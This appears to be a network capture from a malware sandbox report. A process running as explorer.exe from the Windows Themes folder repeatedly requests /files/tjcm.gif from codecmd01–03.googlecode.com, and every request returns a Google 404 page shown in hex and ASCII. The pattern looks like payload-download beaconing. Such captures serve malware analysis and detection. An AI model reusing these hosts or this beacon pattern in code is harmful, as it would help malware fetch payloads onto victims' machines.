Sep 2, 2024 14:25:31.961060047 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:31 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:31.961106062 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	60924	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:32.495842934 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:33.180332899 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:33 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:33.180351973 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	60925	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:33.708385944 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:34.398102999 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:34 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:34.398130894 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	60926	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:35.140577078 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:35.619330883 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:35 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:35.619350910 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	60927	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:35.985097885 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:36.670576096 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:36 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:36.670608997 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	60928	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:37.049973011 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:37.747672081 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:37 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:37.747693062 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	60929	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:38.076531887 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:38.774056911 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:38 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:38.774075031 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	60930	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:39.132606983 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:39.821644068 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:39 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> 